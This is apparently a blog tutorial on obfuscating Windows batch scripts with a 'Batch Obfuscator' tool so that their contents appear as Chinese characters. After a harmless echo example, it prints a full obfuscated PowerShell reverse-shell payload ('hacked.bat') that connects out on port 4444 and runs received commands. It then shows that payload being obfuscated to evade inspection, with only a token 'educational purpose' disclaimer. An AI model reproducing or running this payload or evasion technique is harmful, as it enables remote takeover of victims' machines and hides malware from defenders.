Batch Obfuscation

Hi! We are talking about Batch Obfuscation.

As we know Batch Obfuscation techniques, hackers always using encrypt or hiding their malicious code. We will getting deeply this techniques and talking about Batch Obfuscation.

What We Need?

Firstly, we need a windows machine for using Batch Obfuscation and secondly we need Batch Obfuscator Framework. İf you don’t have a any Batch Obfuscator tool or framework. You can install this resource on your windows machine. It will change every words to Chines words.

If you clone this repository then we can ready to use. Let’s test BatchObbuscator! I want to try on simple batch code. I am creating test.bat file and write this sample code

@echo off
title this is your first batch script.
echo Welcome to batch scripting.

Open up a new CMD console, then you can use like this.

Welcome to batch scripting.
Press any key to continue . . .
The batch file cannot be found.


Let’s test what changes in our content using Batch Obfuscator

C:\Users\furka\Desktop\batchwrite\BatchObfuscator-master>obfuscator.cmd test.bat
Input Length = 14
Output Length = 8
CertUtil: -decode command completed successfully.
        1 file(s) copied.

If we open new “testo.bat” file with any text editor, we can see Chinese characters!


Running “testo.bat” in CMD

Welcome to batch scripting.
Press any key to continue . . .

We can see the same output. That’s meaning, Batch Obfuscator is running excellent!

Real Life Sample

We’re see on this sample, Batch Obfuscator tool just chancing every characters to Chinese characters. But nothing chanced on running time. Then we can say, if I can use for a malicious code nothing will be happened. Let’s try and see what happening. I will use Kali Linux for creating a malicious code. You can create it any way you want. ‘Please Just Use For Educational Purpose!’

I’ m create malicious code and giving name to ‘hacked.bat’ then getting reverse shell on CMD. I’m listening on 4444 port.


cMD.EXe/C"SET  swx=Set-Variable -Name client -Value (New-Object System.Net.Sockets.TCPClient("",4444));Set-Variable -Name stream -Value ($client.GetStream());[byte[]]$bytes = 0..65535^|%{0};while((Set-Variable -Name i -Value ($stream.Read($bytes, 0, $bytes.Length))) -ne 0){;Set-Variable -Name data -Value ((New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i));Set-Variable -Name sendback -Value (iex $data 2^>^&1 ^| Out-String );Set-Variable -Name sendback2 -Value ($sendback + "PS " + (pwd).Path + "^> ");Set-Variable -Name sendbyte -Value (([text.encoding]::ASCII).GetBytes($sendback2));$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()&& C:\windOws\sySWoW64\WINDOwsPowERSHelL\v1.0\PoWerShEll.EXe     ^&  ( 'Sv'  )  (\"{1}{0}\"-f 'Y3','4' ) (  [tyPE](\"{0}{3}{1}{2}\" -f'eNv','ME','Nt','iroN')   )    ;   (   (  ^&  (  \"{0}{2}{1}\"-f 'c','ItEM','hiLD' )  ( \"{1}{0}{3}{2}\" -f 'BLe','Varia','y3',':4')  ).\"Va`lUe\"::( \"{4}{5}{3}{0}{2}{1}\"-f 'Ia','E','bl','EnvIroNmEntvAR','ge','t'  ).Invoke(  'SWx',(  \"{0}{1}{2}\" -f'Pr','O','cEss'  ))  )^| ^& (   ${ShEL`lId}[1] +${Sh`EL`lID}[13]  + 'x')"

Now we can test on ‘hacked.bat’. Here is the results:

C:\Users\furka\Desktop\batchwrite\BatchObfuscator-master>obfuscator.cmd hacked.bat
Input Length = 14
Output Length = 8
CertUtil: -decode command completed successfully.
        1 file(s) copied.

Name is changeced to ‘hackedo.bat’. Let’s open the file with any text editor.



We are see the Chinese characters. If I run the ‘hacked.bat’ I can get a reverse shell on CMD.

Thanks for reading, I hope you learned something.